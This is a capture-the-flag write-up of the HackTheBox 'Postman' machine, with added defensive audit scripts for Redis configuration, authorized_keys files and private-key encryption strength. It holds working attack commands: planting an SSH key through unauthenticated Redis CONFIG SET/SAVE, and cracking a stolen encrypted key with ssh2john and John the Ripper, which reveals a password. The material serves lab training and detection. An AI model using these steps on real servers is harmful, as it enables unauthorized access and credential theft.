Port 53

Tech notes for tomorrow

HackTheBox Postman Walkthrough

This time it's Postman. From the name I expected some email-related vulnerability, but it was nothing of the sort...
I've gotten fairly used to this by now, and I'm getting quicker at figuring out where to look to get User.

Contents

Recon

nmap

TCP ports 22, 80, 6379 and 10000 are open.
6379 is Redis, and some kind of web service also seems to be running on 10000.
I'll go through them one at a time.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -A -Pn 10.129.2.1 -p-                                                                              
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-24 20:20 JST
Nmap scan report for 10.129.2.1
Host is up (0.17s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Cyber Geek's Personal Website
|_http-server-header: Apache/2.4.29 (Ubuntu)
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=3/24%OT=22%CT=1%CU=30196%PV=Y%DS=2%DC=T%G=Y%TM=623C028
OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST1
OS:1NW7%O6=M505ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 3306/tcp)
HOP RTT       ADDRESS
1   178.96 ms 10.10.14.1
2   179.08 ms 10.129.2.1

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 755.39 seconds

Checking SSH

It appears to accept password login.
It might be usable if I can find credentials.

┌──(kali㉿kali)-[~]
└─$ ssh root@10.129.2.1                                                                                             
The authenticity of host '10.129.2.1 (10.129.2.1)' can't be established.
ED25519 key fingerprint is SHA256:eBdalosj8xYLuCyv0MFDgHIabjJ9l3TMv1GYjZdxY9Y.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.2.1' (ED25519) to the list of known hosts.
root@10.129.2.1's password: 
Permission denied, please try again.
root@10.129.2.1's password: 
Permission denied, please try again.
root@10.129.2.1's password: 
root@10.129.2.1: Permission denied (publickey,password).

Checking the web services

This time both 80 and 10000 are there, so I'll check each one.

TCP port 80

Run a directory search with Gobuster.

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://10.129.2.1/ -w /usr/share/dirb/wordlists/common.txt -s '200,204,301,302,307,403,500' -e
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.2.1/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2022/03/24 20:36:01 Starting gobuster in directory enumeration mode
===============================================================
http://10.129.2.1/.htaccess            (Status: 403) [Size: 294]
http://10.129.2.1/.hta                 (Status: 403) [Size: 289]
http://10.129.2.1/.htpasswd            (Status: 403) [Size: 294]
http://10.129.2.1/css                  (Status: 301) [Size: 306] [--> http://10.129.2.1/css/]
http://10.129.2.1/fonts                (Status: 301) [Size: 308] [--> http://10.129.2.1/fonts/]
http://10.129.2.1/images               (Status: 301) [Size: 309] [--> http://10.129.2.1/images/]
http://10.129.2.1/index.html           (Status: 200) [Size: 3844]                               
http://10.129.2.1/js                   (Status: 301) [Size: 305] [--> http://10.129.2.1/js/]    
http://10.129.2.1/server-status        (Status: 403) [Size: 298]                                
http://10.129.2.1/upload               (Status: 301) [Size: 309] [--> http://10.129.2.1/upload/]
                                                                                                
===============================================================
2022/03/24 20:37:30 Finished
===============================================================

I also looked inside /upload, but it didn't look very interesting.

TCP port 10000

On closer inspection this one is also HTTP.
gobuster didn't work on it, so I accessed it directly and was told it needs HTTPS.
Accessing it over HTTPS brought up the Webmin login screen.

When I looked up what to do if you've forgotten the password, this came up.
I thought it might be usable, but it seems it won't work until I have a shell.

How to recover a forgotten Webmin login user or password

Checking Redis

Redis is a key-value NoSQL store.
Since the port is open, maybe I can access it?
First, install the client tool.

sudo apt install redis-tools

┌──(kali㉿kali)-[~]
└─$ redis-cli -h 10.129.2.1 -p 6379
10.129.2.1:6379> 

I got in without any authentication.

HackTricks: 6379 - Pentesting Redis

Using this link as a guide, I'll investigate Redis.
First, check client and configuration information with client list and config get *.

┌──(kali㉿kali)-[~]
└─$ redis-cli -h 10.129.2.1 -p 6379
10.129.2.1:6379> client list
id=3 addr=10.10.14.2:48054 fd=8 name= age=11 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=0 qbuf-free=32768 obl=0 oll=0 omem=0 events=r cmd=client
10.129.2.1:6379> config get *
  1) "dbfilename"
  2) "dump.rdb"
  3) "requirepass"
  4) ""
  5) "masterauth"
  6) ""
  7) "cluster-announce-ip"
  8) ""
  9) "unixsocket"
 10) ""
 11) "logfile"
 12) "/var/log/redis/redis-server.log"
 13) "pidfile"
 14) "/var/run/redis/redis-server.pid"
 15) "slave-announce-ip"
 16) ""
 17) "maxmemory"
 18) "0"
 19) "proto-max-bulk-len"
 20) "536870912"
 21) "client-query-buffer-limit"
 22) "1073741824"
 23) "maxmemory-samples"
 24) "5"
 25) "lfu-log-factor"
 26) "10"
 27) "lfu-decay-time"
 28) "1"
 29) "timeout"
 30) "0"
 31) "active-defrag-threshold-lower"
 32) "10"
 33) "active-defrag-threshold-upper"
 34) "100"
 35) "active-defrag-ignore-bytes"
 36) "104857600"
 37) "active-defrag-cycle-min"
 38) "25"
 39) "active-defrag-cycle-max"
 40) "75"
 41) "auto-aof-rewrite-percentage"
 42) "100"
 43) "auto-aof-rewrite-min-size"
 44) "67108864"
 45) "hash-max-ziplist-entries"
 46) "512"
 47) "hash-max-ziplist-value"
 48) "64"
 49) "list-max-ziplist-size"
 50) "-2"
 51) "list-compress-depth"
 52) "0"
 53) "set-max-intset-entries"
 54) "512"
 55) "zset-max-ziplist-entries"
 56) "128"
 57) "zset-max-ziplist-value"
 58) "64"
 59) "hll-sparse-max-bytes"
 60) "3000"
 61) "lua-time-limit"
 62) "5000"
 63) "slowlog-log-slower-than"
 64) "10000"
 65) "latency-monitor-threshold"
 66) "0"
 67) "slowlog-max-len"
 68) "128"
 69) "port"
 70) "6379"
 71) "cluster-announce-port"
 72) "0"
 73) "cluster-announce-bus-port"
 74) "0"
 75) "tcp-backlog"
 76) "511"
 77) "databases"
 78) "16"
 79) "repl-ping-slave-period"
 80) "10"
 81) "repl-timeout"
 82) "60"
 83) "repl-backlog-size"
 84) "1048576"
 85) "repl-backlog-ttl"
 86) "3600"
 87) "maxclients"
 88) "10000"
 89) "watchdog-period"
 90) "0"
 91) "slave-priority"
 92) "100"
 93) "slave-announce-port"
 94) "0"
 95) "min-slaves-to-write"
 96) "0"
 97) "min-slaves-max-lag"
 98) "10"
 99) "hz"
100) "10"
101) "cluster-node-timeout"
102) "15000"
103) "cluster-migration-barrier"
104) "1"
105) "cluster-slave-validity-factor"
106) "10"
107) "repl-diskless-sync-delay"
108) "5"
109) "tcp-keepalive"
110) "300"
111) "cluster-require-full-coverage"
112) "yes"
113) "cluster-slave-no-failover"
114) "no"
115) "no-appendfsync-on-rewrite"
116) "no"
117) "slave-serve-stale-data"
118) "yes"
119) "slave-read-only"
120) "yes"
121) "stop-writes-on-bgsave-error"
122) "yes"
123) "daemonize"
124) "yes"
125) "rdbcompression"
126) "yes"
127) "rdbchecksum"
128) "yes"
129) "activerehashing"
130) "yes"
131) "activedefrag"
132) "no"
133) "protected-mode"
134) "no"
135) "repl-disable-tcp-nodelay"
136) "no"
137) "repl-diskless-sync"
138) "no"
139) "aof-rewrite-incremental-fsync"
140) "yes"
141) "aof-load-truncated"
142) "yes"
143) "aof-use-rdb-preamble"
144) "no"
145) "lazyfree-lazy-eviction"
146) "no"
147) "lazyfree-lazy-expire"
148) "no"
149) "lazyfree-lazy-server-del"
150) "no"
151) "slave-lazy-flush"
152) "no"
153) "maxmemory-policy"
154) "noeviction"
155) "loglevel"
156) "notice"
157) "supervised"
158) "no"
159) "appendfsync"
160) "everysec"
161) "syslog-facility"
162) "local0"
163) "appendonly"
164) "no"
165) "dir"
166) "/var/lib/redis"
167) "save"
168) "900 1 300 10 60 10000"
169) "client-output-buffer-limit"
170) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60"
171) "unixsocketperm"
172) "0"
173) "slaveof"
174) ""
175) "notify-keyspace-events"
176) ""
177) "bind"
178) "0.0.0.0 ::1"
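The settings that matter in the listing above are requirepass, protected-mode, bind, dir and dbfilename. The following is an added audit script, not part of the original post: it parses redis-cli's numbered `config get *` output and flags the combination that made this instance reachable and writable. The two listings are constructed samples; the weak one mirrors the values above, the hardened one shows the same keys as they should look.

```python
import re
from typing import Dict, List

# redis-cli prints `config get *` as a numbered list alternating key, value.
ITEM_RE = re.compile(r'^\s*\d+\)\s+"(.*)"\s*$')

# Constructed sample trimmed to the keys this audit inspects; values mirror Postman's output.
WEAK_LISTING = '''
  1) "dbfilename"
  2) "dump.rdb"
  3) "requirepass"
  4) ""
133) "protected-mode"
134) "no"
165) "dir"
166) "/var/lib/redis"
177) "bind"
178) "0.0.0.0 ::1"
'''

# The same keys on a hardened instance (constructed): loopback only, password set.
HARDENED_LISTING = '''
  1) "dbfilename"
  2) "dump.rdb"
  3) "requirepass"
  4) "correct-horse-battery-staple"
  5) "protected-mode"
  6) "yes"
  7) "dir"
  8) "/var/lib/redis"
  9) "bind"
 10) "127.0.0.1 ::1"
'''

def parse_config_get(listing: str) -> Dict[str, str]:
    """Turn the numbered listing into a {key: value} dict."""
    items = [m.group(1) for m in map(ITEM_RE.match, listing.splitlines()) if m]
    if len(items) % 2:
        raise ValueError("odd number of items: listing is truncated")
    return dict(zip(items[0::2], items[1::2]))

def audit_redis_config(cfg: Dict[str, str]) -> List[str]:
    """Return findings describing how far an unauthenticated client can get."""
    findings: List[str] = []
    binds = cfg.get("bind", "").split()
    wildcard = any(b in ("0.0.0.0", "::", "*") for b in binds)
    no_auth = not cfg.get("requirepass")
    unprotected = cfg.get("protected-mode", "yes") != "yes"
    if wildcard or not binds:
        findings.append("bind: reachable on all interfaces (%s)" % (cfg.get("bind") or "unset"))
    if no_auth:
        findings.append("requirepass: empty, clients are never asked to AUTH")
    if unprotected:
        findings.append("protected-mode: off, no fallback for an unset bind/password")
    # protected-mode only guards the case where bind is not configured at all;
    # an explicit 0.0.0.0 bind, as on Postman, is not covered by it.
    if no_auth and (wildcard or (not binds and unprotected)):
        findings.append("CRITICAL: any network client can CONFIG SET dir/dbfilename and SAVE, "
                        "dropping an RDB snapshot wherever the redis user can write "
                        "(current dir: %s)" % cfg.get("dir"))
    return findings

def audit_listing(listing: str) -> List[str]:
    """Convenience wrapper: raw redis-cli output in, findings out."""
    return audit_redis_config(parse_config_get(listing))
```

The first three findings each warrant a config change; the CRITICAL one is the exact condition exploited further down, and is the line a monitoring job should page on.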

Also grab the server information with the info command.

10.129.2.1:6379> info
# Server
redis_version:4.0.9
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:9435c3c2879311f3
redis_mode:standalone
os:Linux 4.15.0-58-generic x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:7.4.0
process_id:682
run_id:0b25ff39a8a45e35f08abb26c1540974b208ae54
tcp_port:6379
uptime_in_seconds:660
uptime_in_days:0
hz:10
lru_clock:4013360
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf

# Clients
connected_clients:1
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0

# Memory
used_memory:841272
used_memory_human:821.55K
used_memory_rss:3883008
used_memory_rss_human:3.70M
used_memory_peak:841272
used_memory_peak_human:821.55K
used_memory_peak_perc:100.12%
used_memory_overhead:832086
used_memory_startup:782456
used_memory_dataset:9186
used_memory_dataset_perc:15.62%
total_system_memory:941203456
total_system_memory_human:897.60M
used_memory_lua:37888
used_memory_lua_human:37.00K
maxmemory:0
maxmemory_human:0B
maxmemory_policy:noeviction
mem_fragmentation_ratio:4.61
mem_allocator:jemalloc-3.6.0
active_defrag_running:0
lazyfree_pending_objects:0

# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1648179868
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:-1
rdb_current_bgsave_time_sec:-1
rdb_last_cow_size:0
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
aof_last_cow_size:0

# Stats
total_connections_received:1
total_commands_processed:3
instantaneous_ops_per_sec:0
total_net_input_bytes:89
total_net_output_bytes:13364
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
expired_stale_perc:0.00
expired_time_cap_reached_count:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
migrate_cached_sockets:0
slave_expires_tracked_keys:0
active_defrag_hits:0
active_defrag_misses:0
active_defrag_key_hits:0
active_defrag_key_misses:0

# Replication
role:master
connected_slaves:0
master_replid:39edf04a0e1be2326ef2ad6a4d3a704d90b16a2c
master_replid2:0000000000000000000000000000000000000000
master_repl_offset:0
second_repl_offset:-1
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0

# CPU
used_cpu_sys:0.49
used_cpu_user:0.15
used_cpu_sys_children:0.00
used_cpu_user_children:0.00

# Cluster
cluster_enabled:0

# Keyspace

Following the URL above, I consider whether an SSH key generated on my side can be planted into Redis.

The directory to plant it in is /var/lib/redis.

10.129.2.1:6379> config get dir
1) "dir"
2) "/var/lib/redis"

Prepare a key pair, write its contents to a text file, and then write that into Redis.

┌──(kali㉿kali)-[~]
└─$ ssh-keygen -t rsa                           
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kali/.ssh/id_rsa
Your public key has been saved in /home/kali/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:***************************************** kali@kali
The key's randomart image is:
(omitted)

┌──(kali㉿kali)-[~]
└─$ ls /home/kali/.ssh
id_rsa  id_rsa.pub  known_hosts
                                                                                                                        
┌──(kali㉿kali)-[~]
└─$ (echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > spaced_key.txt
                                                                             
┌──(kali㉿kali)-[~]
└─$ cat spaced_key.txt | redis-cli -h 10.129.2.1 -x set ssh_key
OK
                    

On the Redis server side, save the public key that was written.

10.129.2.1:6379> config set dir /var/lib/redis/.ssh
OK
10.129.2.1:6379> config set dbfilename "authorized_keys"
OK
10.129.2.1:6379> save
OK
10.129.2.1:6379> config get dir
1) "dir"
2) "/var/lib/redis/.ssh"
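The trick above works because the RDB file now sitting at /var/lib/redis/.ssh/authorized_keys is mostly binary, and sshd simply skips every line that does not parse as a key; the blank lines added around the public key guarantee it lands on a line of its own. The following is an added detection example, not code from the original post: it walks an authorized_keys file the way sshd does, counts the lines sshd would ignore, and reports the RDB magic and control bytes that a hand-written file never contains. The key line and the dump are constructed samples.

```python
import base64
import struct
from typing import Dict, List, Optional, Tuple

def _ssh_string(b: bytes) -> bytes:
    """SSH wire-format string: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b

def make_sample_pubkey(comment: str = "kali@kali") -> str:
    """Constructed ssh-rsa line: well-formed on the wire, not a usable key."""
    blob = (_ssh_string(b"ssh-rsa") + _ssh_string(b"\x01\x00\x01")
            + _ssh_string(b"\x00" + b"\x42" * 64))
    return "ssh-rsa " + base64.b64encode(blob).decode() + " " + comment

def parse_key_line(line: bytes) -> Optional[Tuple[str, str]]:
    """Mimic sshd's tolerant parsing: a line counts only if it is
    '<type> <base64> [comment]' and the blob's first field repeats the type.
    (Option prefixes such as command="..." are not handled here.)"""
    parts = line.split(None, 2)
    if len(parts) < 2:
        return None
    try:
        blob = base64.b64decode(parts[1], validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    if len(blob) < 4:
        return None
    n = struct.unpack(">I", blob[:4])[0]
    if blob[4:4 + n] != parts[0]:
        return None
    comment = parts[2].decode("utf-8", "replace") if len(parts) > 2 else ""
    return parts[0].decode(), comment

def scan_authorized_keys(data: bytes) -> Dict[str, object]:
    """Walk the file line by line like sshd does and report what does not belong."""
    keys, junk = [], 0
    for raw in data.split(b"\n"):
        line = raw.strip()
        if not line or line.startswith(b"#"):
            continue
        parsed = parse_key_line(line)
        if parsed:
            keys.append(parsed)
        else:
            junk += 1
    indicators: List[str] = []
    if data.startswith(b"REDIS"):
        indicators.append("starts with the Redis RDB magic: file was written by a Redis SAVE")
    if any(b == 0 or (b < 32 and b not in (9, 10, 13)) for b in data):
        indicators.append("contains control/NUL bytes: not a hand-written text file")
    if junk:
        indicators.append("%d line(s) sshd would ignore" % junk)
    return {"keys": keys, "unparseable_lines": junk, "indicators": indicators}

KEY_LINE = make_sample_pubkey().encode()
# Constructed approximation of the dump Postman's Redis wrote as authorized_keys:
# RDB header, the key padded with the blank lines from the walkthrough, binary tail.
SAMPLE_RDB_DUMP = (b"REDIS0008\xfa\tredis-ver\x054.0.9\xfe\x00\x00\x07ssh_key"
                   + b"\n\n" + KEY_LINE + b"\n\n" + b"\xff\x8a\x12\x00\x91zz\x01\x02")
# A normal authorized_keys file for comparison (constructed).
SAMPLE_CLEAN_FILE = b"# kali workstation\n" + KEY_LINE + b"\n"
```

Run over every user's authorized_keys (including service accounts such as redis that should not have one at all), any non-empty indicators list is worth an alert.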

Log in right away with the key that was written. I'm on the Redis server.

┌──(kali㉿kali)-[~]
└─$ ssh -i id_rsa redis@10.129.2.1
Warning: Identity file id_rsa not accessible: No such file or directory.
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$ 
redis@Postman:~$ whoami
redis

redis@Postman:~$ pwd
/var/lib/redis
redis@Postman:~$ cd /home
redis@Postman:/home$ ls -ltr
total 4
drwxr-xr-x 6 Matt Matt 4096 Sep 11  2019 Matt
redis@Postman:/home$ cd Matt
redis@Postman:/home/Matt$ ls -ltr
total 4
-rw-rw---- 1 Matt Matt 33 Mar 25 03:45 user.txt
redis@Postman:/home/Matt$ cat user.txt
cat: user.txt: Permission denied

There is a user called Matt, but I'm currently the redis user so I can't get in.
It looks like I need to get a shell as Matt.

No point lamenting, so I rummage through the folders the redis user can see.
Then I found a backup of Matt's private key in /opt.

redis@Postman:/$ ls -ltr
total 483892
drwx------  2 root root     16384 Aug 24  2019 lost+found
-rw-------  1 root root 495416320 Aug 24  2019 swapfile
drwxr-xr-x  2 root root      4096 Aug 24  2019 media
drwxr-xr-x  2 root root      4096 Aug 24  2019 srv
drwxr-xr-x  2 root root      4096 Aug 24  2019 mnt
drwxr-xr-x 10 root root      4096 Aug 24  2019 usr
drwxr-xr-x  2 root root      4096 Aug 24  2019 lib64
lrwxrwxrwx  1 root root        30 Aug 24  2019 vmlinuz.old -> boot/vmlinuz-4.15.0-58-generic
lrwxrwxrwx  1 root root        30 Aug 24  2019 vmlinuz -> boot/vmlinuz-4.15.0-58-generic
lrwxrwxrwx  1 root root        33 Aug 24  2019 initrd.img.old -> boot/initrd.img-4.15.0-58-generic
lrwxrwxrwx  1 root root        33 Aug 24  2019 initrd.img -> boot/initrd.img-4.15.0-58-generic
drwxr-xr-x  3 root root      4096 Aug 24  2019 boot
-rw-r--r--  1 root root      2086 Aug 25  2019 webmin-setup.out
drwxr-xr-x  2 root root      4096 Aug 25  2019 bin
drwxr-xr-x 13 root root      4096 Aug 25  2019 var
drwxr-xr-x  3 root root      4096 Sep 11  2019 home
drwxr-xr-x  2 root root      4096 Sep 11  2019 opt
drwxr-xr-x 18 root root      4096 Oct 25  2019 lib
drwxr-xr-x  2 root root      4096 Sep 29  2020 sbin
drwxr-xr-x 82 root root      4096 Sep 29  2020 etc
dr-xr-xr-x 96 root root         0 Mar 25 03:44 proc
dr-xr-xr-x 13 root root         0 Mar 25 03:44 sys
drwxr-xr-x 18 root root      3780 Mar 25 03:44 dev
drwx------  8 root root      4096 Mar 25 03:45 root
drwxr-xr-x 21 root root       620 Mar 25 04:31 run
drwxrwxrwt 13 root root      4096 Mar 25 04:39 tmp

redis@Postman:/$ cd /opt
redis@Postman:/opt$ ls -ltr
total 4
-rwxr-xr-x 1 Matt Matt 1743 Aug 26  2019 id_rsa.bak

redis@Postman:/opt$ cat id_rsa.bak
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
(key body omitted)
-----END RSA PRIVATE KEY-----
redis@Postman:/opt$ 

It can't be used as-is, so I'll crack the private key.
For cracking, I'll use ssh2john.py, which comes with John the Ripper.
Kali doesn't include this script, so download it from GitHub.

Cracking the private key

For the cracking wordlist I used /usr/share/wordlists/rockyou.txt.

┌──(kali㉿kali)-[~]
└─$ wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/ssh2john.py
--2022-03-25 14:00:00--  https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/ssh2john.py
raw.githubusercontent.com (raw.githubusercontent.com) をDNSに問いあわせています... 185.199.111.133, 185.199.109.133, 185.199.110.133, ...
raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443 に接続しています... 接続しました。
HTTP による接続要求を送信しました、応答を待っています... 200 OK
長さ: 8537 (8.3K) [text/plain]
`ssh2john.py' に保存中

ssh2john.py                   100%[=================================================>]   8.34K  --.-KB/s 時間 0s       

2022-03-25 14:00:00 (26.7 MB/s) - `ssh2john.py' へ保存完了 [8537/8537]

┌──(kali㉿kali)-[~/tools]
└─$ python ssh2john.py id_rsa.bak > id_rsa.hash                                                                   
                                                                                                                        
┌──(kali㉿kali)-[~/tools]
└─$ ls -ltr 
合計 568
-rwxr-xr-x 1 kali kali 311296  717  2019 plink.exe
-rwxr-xr-x 1 kali kali  59392  717  2019 nc_win.exe
drwxr-xr-x 6 kali kali   4096  429  2021 sherlock
-rwxr-xr-x 1 kali kali  31232  429  2021 churrasco.exe
drwxr-xr-x 2 kali kali   4096  54  2021 Windows-Exploit-Suggester-master
-rwxr-xr-x 1 kali kali  73802  54  2021 shell.exe
drwxr-xr-x 9 kali kali   4096  55  2021 dirsearch
-rwxr-xr-x 1 kali kali   5492 1012 23:39 php-reverse-shell.php
-rwxr-xr-x 1 kali kali   5492 1012 23:43 image.php
-rw-r--r-- 1 kali kali  46631 1013 00:16 LinEnum.sh
-rwxr-xr-x 1 kali kali   8537  325 14:00 ssh2john.py
-rw-r--r-- 1 kali kali   1743  325 14:09 id_rsa.bak
-rw-r--r-- 1 kali kali   2429  325 14:11 id_rsa.hash
                                                                                                                        
┌──(kali㉿kali)-[~/tools]
└─$ cat id_rsa.hash      
id_rsa.bak:$sshng$0$8$73E9CEFBCCF5287C$1192$(hash body omitted)
                        


┌──(kali㉿kali)-[~/tools]
└─$ sudo gunzip /usr/share/wordlists/rockyou.txt.gz                                                                 
[sudo] kali のパスワード:
                                                                                                                        
┌──(kali㉿kali)-[~/tools]
└─$ john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt   
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (id_rsa.bak)     
1g 0:00:00:00 DONE (2022-03-25 14:36) 5.000g/s 1234Kp/s 1234Kc/s 1234KC/s confused6..comett
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                        
┌──(kali㉿kali)-[~/tools]
└─$ john --show id_rsa.hash                                     
id_rsa.bak:computer2008

1 password hash cracked, 0 left

The password turned out to be computer2008.
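The reason rockyou.txt got there in under a second is visible in john's output: "Cost 1 (KDF/cipher) is 1" means MD5/3DES, i.e. the legacy PEM format whose Proc-Type/DEK-Info headers id_rsa.bak carries, where the passphrase goes through a single MD5 pass rather than bcrypt. The following is an added audit script, not part of the original post: it classifies a private key file by format, cipher and KDF work factor so such backups can be found before someone else does. The legacy sample reuses only the headers of /opt/id_rsa.bak (body omitted); the openssh-key-v1 sample is a constructed header as ssh-keygen -o -a 16 would write it.

```python
import base64
import struct
from typing import Dict

def _read_string(buf: bytes, off: int):
    """SSH wire-format string: 4-byte big-endian length, then the bytes."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n

def _ssh_string(b: bytes) -> bytes:
    return struct.pack(">I", len(b)) + b

def classify_private_key(text: str) -> Dict[str, object]:
    """Report format, cipher and KDF work factor of a private key file."""
    lines = [l.strip() for l in text.strip().splitlines()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        body = base64.b64decode("".join(lines[1:-1]))
        if not body.startswith(b"openssh-key-v1\x00"):
            raise ValueError("bad openssh-key-v1 magic")
        off = len(b"openssh-key-v1\x00")
        cipher, off = _read_string(body, off)
        kdf, off = _read_string(body, off)
        kdfopts, off = _read_string(body, off)
        rounds = 0
        if kdf == b"bcrypt":            # kdfoptions = string salt, uint32 rounds
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        return {"format": "openssh-key-v1", "cipher": cipher.decode(),
                "kdf": kdf.decode(), "rounds": rounds, "encrypted": cipher != b"none"}
    # Legacy PEM: RFC 1421 headers directly after the BEGIN line signal encryption.
    headers = {}
    for l in lines[1:]:
        if ":" not in l:
            break
        k, v = l.split(":", 1)
        headers[k.strip()] = v.strip()
    if headers.get("Proc-Type") == "4,ENCRYPTED":
        cipher, salt = headers["DEK-Info"].split(",")
        # OpenSSL derives the key with EVP_BytesToKey: one MD5 pass per 16-byte
        # block (3DES's 24-byte key needs two blocks, which john reports as cost 2).
        return {"format": "pem", "cipher": cipher, "kdf": "EVP_BytesToKey-MD5",
                "rounds": 1, "encrypted": True, "salt": salt}
    return {"format": "pem", "cipher": "none", "kdf": "none", "rounds": 0, "encrypted": False}

def verdict(info: Dict[str, object]) -> str:
    """One-line assessment; 16 rounds is ssh-keygen's default for -a."""
    if not info["encrypted"]:
        return "weak: private key stored unencrypted"
    if info["kdf"] != "bcrypt":
        return "weak: %s with a one-pass MD5 KDF, wordlist guessing runs at CPU speed" % info["cipher"]
    if info["rounds"] < 16:
        return "weak: bcrypt with only %d rounds" % info["rounds"]
    return "ok: %s with bcrypt, %d rounds" % (info["cipher"], info["rounds"])

# Constructed sample with the same headers as /opt/id_rsa.bak; body replaced by a stub.
LEGACY_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

AAAA
-----END RSA PRIVATE KEY-----"""

# Constructed openssh-key-v1 header; only the fields this parser reads are meaningful.
_body = (b"openssh-key-v1\x00" + _ssh_string(b"aes256-ctr") + _ssh_string(b"bcrypt")
         + _ssh_string(_ssh_string(b"\x11" * 16) + struct.pack(">I", 16))
         + struct.pack(">I", 1) + _ssh_string(b"") + _ssh_string(b""))
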